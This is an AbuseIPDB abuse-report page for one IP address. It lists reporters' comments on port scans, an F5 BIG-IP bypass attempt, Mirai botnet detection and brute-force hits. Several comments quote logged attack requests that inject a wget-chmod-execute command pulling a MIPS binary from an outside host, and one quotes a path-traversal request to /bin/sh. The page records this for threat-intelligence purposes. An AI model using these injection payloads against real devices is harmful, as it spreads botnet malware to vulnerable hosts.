JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 4.157.90.161

4.157.90.161 was found in our database!

This IP was reported 37 times. Confidence of Abuse is 100%: ?

100%

ISP	Microsoft Corporation
Usage Type	Data Center/Web Hosting/Transit
ASN	AS8075
Domain Name	microsoft.com
Country	🇺🇸 United States of America
City	Washington, Virginia

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 4.157.90.161

Whois 4.157.90.161

IP Abuse Reports for 4.157.90.161:

This IP address has been reported a total of 37 times from 34 distinct sources. 4.157.90.161 was first reported on June 16th 2026, and the most recent report was 1 hour ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
Anonymous	2026-06-18 18:04:00 (1 hour ago)	F5.BIG-IP.iControl.REST.Authentication.Bypass	Web App Attack
🇩🇰 swrlly	2026-06-18 16:42:53 (2 hours ago)	1 unauthorized webserver connection	Web App Attack
🇺🇸 xmission.com	2026-06-18 13:44:23 (5 hours ago)	Blocked by UFW (TCP on 80) Source port: 5126 TTL: 46 Packet length: 40 TOS: 0x00 This report (for 4 ... show more Blocked by UFW (TCP on 80) Source port: 5126 TTL: 46 Packet length: 40 TOS: 0x00 This report (for 4.157.90.161) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Web App Attack
🇩🇪 london2038.com	2026-06-18 13:34:36 (5 hours ago)	Malformed or malicious web request 4.157.90.161 - - [18/Jun/2026:15:34:32 +0200] "POST /cgi-bin/oper ... show more Malformed or malicious web request 4.157.90.161 - - [18/Jun/2026:15:34:32 +0200] "POST /cgi-bin/operator/servetest?cmd=ntp&ServerName=%24%28wget%20http%3A%2F%2F31.56.39.60%2Fmemory_bin_dir%2Fmemory_load.mips%3B%20chmod%20%2Bx%20memory_load.mips%3B%20.%2Fmemory_load.mips%29&TimeZone=01:00 HTTP/1.1" 400 157 "-" "-" show less	Hacking Web App Attack
🇩🇪 strxmpp	2026-06-18 10:15:04 (8 hours ago)	4.157.90.161 - - [18/Jun/2026:12:15:03 +0200] "GET /cgibin/mainfunction.cgi&action=login&keyPath=wge ... show more 4.157.90.161 - - [18/Jun/2026:12:15:03 +0200] "GET /cgibin/mainfunction.cgi&action=login&keyPath=wget+http%3A%2F%2F31.56.39.60%2Fmemory_bin_dir%2Fmemory_load.mips+%3B+chmod+777+memory_load.mips+%3B+sh+memory_load.mips&loginUser=a&loginPwd=a HTTP/1.1" 400 523 "-" "Mozilla/5.0" ... show less	Bad Web Bot
🇳🇱 Yachiyo Runami	2026-06-18 10:12:51 (8 hours ago)	Port Scan on Honeypot \| Ports: 80/HTTP \| Proto: TCP(1) \| Flags: all SYN \| TTL: 39 \| Len: 40B \| Win: ... show more Port Scan on Honeypot \| Ports: 80/HTTP \| Proto: TCP(1) \| Flags: all SYN \| TTL: 39 \| Len: 40B \| Win: 35982(1) \| F2B/ufw-honeypot@2026-06-18T10:12:50Z show less	Port Scan Hacking
🇨🇿 kronos	2026-06-18 08:58:33 (10 hours ago)	IDS: ET INFO F5 BIG-IP - Command Execution via util/bash \| SID:2049259 \| session_sigs:3	Hacking
🇫🇷 Version Net	2026-06-18 08:17:31 (10 hours ago)	IPS Detection: Mirai.Botnet	Hacking
Anonymous	2026-06-18 07:05:33 (12 hours ago)	"POST /cgi-bin/operator/servetest?cmd=ntp&ServerName=%24%28wget%20http%3A%2F%2F31.56.39.60%2Fmemory_ ... show more "POST /cgi-bin/operator/servetest?cmd=ntp&ServerName=%24%28wget%20http%3A%2F%2F31.56.39.60%2Fmemory_bin_dir%2Fmemory_load.mips%3B%20chmod%20%2Bx%20memory_load.mips%3B%20.%2Fmemory_load.mips%29&TimeZone=01:00 HTTP/1.1" show less	Hacking Web App Attack
🇺🇸 jcbriar	2026-06-18 05:45:37 (13 hours ago)	Searching for vulnerable scripts	Hacking Web App Attack
🇫🇷 service Informatique	2026-06-18 04:00:37 (15 hours ago)	GET /config	Web App Attack
🇫🇮 6kilowatti	2026-06-18 00:21:03 (18 hours ago)	4.157.90.161 - - [18/Jun/2026:00:21:02 +0000] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%% ... show more 4.157.90.161 - - [18/Jun/2026:00:21:02 +0000] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 154 "-" "-" ... show less	Web App Attack
🇺🇸 sefinek.net	2026-06-17 22:32:07 (20 hours ago)	Blocked by UFW on NY01 [80/tcp] \| SPT: 5700 \| TTL: 46 \| LEN: 40 \| TOS: 0x08 • Reported by: github.co ... show more Blocked by UFW on NY01 [80/tcp] \| SPT: 5700 \| TTL: 46 \| LEN: 40 \| TOS: 0x08 • Reported by: github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇸🇪 KIDOS	2026-06-17 20:29:33 (22 hours ago)	malicious activity	Web App Attack
🇺🇸 knock	2026-06-17 15:55:27 (1 day ago)	Knock-Knock honeypot brute-force: proto8 (1 total hits)	Brute-Force

Showing 1 to 15 of 37 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇩🇿 41.104.121.17

🇺🇸 20.51.244.151

🇨🇳 14.103.109.71

🇧🇴 190.129.122.185

🇩🇪 185.242.3.195

🇹🇭 165.154.51.27

🇻🇳 103.78.1.33

🇭🇷 95.168.105.38

🇵🇱 83.168.89.49

🇪🇸 79.116.219.3

🇳🇱 45.148.10.147

🇬🇧 35.203.211.28

🇺🇦 104.28.255.120

🇳🇱 86.54.31.38

🇩🇪 84.32.10.200

🇧🇿 45.227.254.152

🇧🇷 45.205.1.5

🇨🇱 200.126.105.149

🇳🇱 176.65.139.222

🇺🇸 162.216.149.192